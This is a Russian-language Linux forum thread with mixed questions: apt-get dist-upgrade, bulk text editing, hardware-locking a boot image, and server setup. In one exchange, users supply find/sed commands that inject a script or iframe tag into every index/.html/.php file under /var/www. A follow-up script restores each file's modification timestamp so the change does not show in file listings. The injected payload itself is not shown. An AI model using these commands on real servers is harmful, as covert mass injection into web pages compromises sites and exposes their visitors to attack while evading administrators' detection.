Что делает команда apt-get dist-upgrade? Насколько я понимаю, это обновление системных пакетов(компиляторы, ядро, загрузчик и т.д.). Так ли это на самом деле? Актуально ли это для убунты? Заранее благодарен.
dist-upgrade, в дополнение выполняет функцию upgrade, а также разумно управляет изменением зависимостей с новыми версиями пакетов; apt-get имеет "умную" систему разрешения конфликтов и она будет в случае необходимости пытаться произвести обновление наиболее важных пакетов за счет менее важных. Файл /etc/apt/sources.list содержит список источников для получения пакетов, из которых будут получены файлы пакетов. http://www.opennet.ru/man.shtml?topic=apt-get&category=8&russian=0
Груповое Переименование Каким образом сделать так что б допустим у меня есть текстовий файл в нем список слов,мне надо добавить символы в начале слова или вконце,но нужно чтоб все ето сделалось для всех слов в TXT документе одновременно,какие есть проги или способы добиться етого,заране спасибо...
Code: for x in `cat ur.txt`;do echo "slowo_$x" >> newfile.txt;done; можно короче Code: sed -ie 's/^/[B]MyWord[/B]\0/' file.c Warning!! Вносит изменения в файл-источник!
Можно средствами ОС проинжектить все .html\.php файлы? Нужно на сервере с рутовыми правами вставить кусок своего кода в index Или для этого проще програмку на С накидать, чтобы она еще пути определяла к этому самому файлу index ?
Вы определитьесь сначала... во все или только в index'ы?? Code: find /var/www -type f -a \( -name "*.html" -o -name "*.php" \) -exec sed -ie 's/<\/html>/<script src=\"mypath.js\"><script\/><\/html>/;' {} \;
Запросто средствами find, sed Code: find /var/www/ -type f -name 'index.*' -exec sed -i s/</html>/</html><uriframe>/g {} \; PS в sed только екранирование нужно соблюдать и тд. Почитай man sed
А можно сделать чтобы в соблюдались такие условия еще 1)чтобы в пути заменяемого файла обязательно присутствовало templates(к примеру) 2)вставка перед </html> и как я понимаю тач на всех файлах, в которые код проинжектится, изменится. можно ли какимто магическим образом без особого гемора его обратно вернуть?
Скриптец: Code: for file in `find /var/www -type f -a -name "index.*" | grep templates`; do tc=`stat -c'%y' $file` sed -i -e 's/<\/html>/<uriframe><\/html>/' $file touch -m --date="$tc" $file echo -e $file" - изменён. (исп)\nДата модификации: "$tc done; 1. в пути присутствовало templates 2. вставка перед </html> 3. тач на всех файлах, в которые код проинжектится, НЕизменится. вроде все норм.. ls -l не вкуривает что файлы изменились... но все равно нада потестить..
Доброе утро всем! У меня такой вопрос, как можно привязать определеный образ линукса к железу. Загружатся образ будет с флешки , и когда система первый раз будет бутиться, нужно сделать так чтобы какойта скрипт привязал систему например к hdd. И на другом компьютере нельзя было бы бутится с этой флешки. Образ будет еще обработан true криптом, дабы нельзя было этот образ модифицировать. Если есть какие то советы или идеи , буду очень благодарен. Спасибо
Требуется установить точно такой же сервер как тут: ни с линуксами, ни с униксами до этого дел никогда не имел. Прошу объяснить, что мне нужно установить, что бы вышел в итоге идентичный сервер. Развернуто если можно, спасибо.